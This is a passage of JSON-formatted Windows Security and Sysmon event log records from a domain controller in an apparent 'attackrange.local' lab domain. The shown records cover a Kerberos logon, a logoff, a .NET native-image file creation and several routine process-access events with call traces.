fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x1184df","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52779","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:03:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220711,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x1184DF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x1184df","LogonType":"3","EventReceivedTime":"2020-08-01 07:03:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9059,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:30.888\r\nProcessGuid: {E2A3D6B1-13BD-5F25-0000-00101E801100}\r\nProcessId: 1492\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\5d4-0\\System.Windows.Forms.dll\r\nCreationUtcTime: 2020-08-01 07:03:30.888","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:30.888","ProcessGuid":"{E2A3D6B1-13BD-5F25-0000-00101E801100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\5d4-0\\System.Windows.Forms.dll","CreationUtcTime":"2020-08-01 07:03:30.888","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9060,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:30.982\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:30.982","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9061,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.091\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001032861100}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.091","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001032861100}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9062,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001032861100}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.091","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001032861100}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9063,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-001032861100}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.107","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-001032861100}","TargetProcessId":"4444","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9064,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.466\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DE891100}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.466","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DE891100}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9065,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DE891100}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:31.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C3-5F25-0000-0010DE891100}","TargetProcessId":"3280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9066,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:31.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C3-5F25-0000-0010DE891100}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 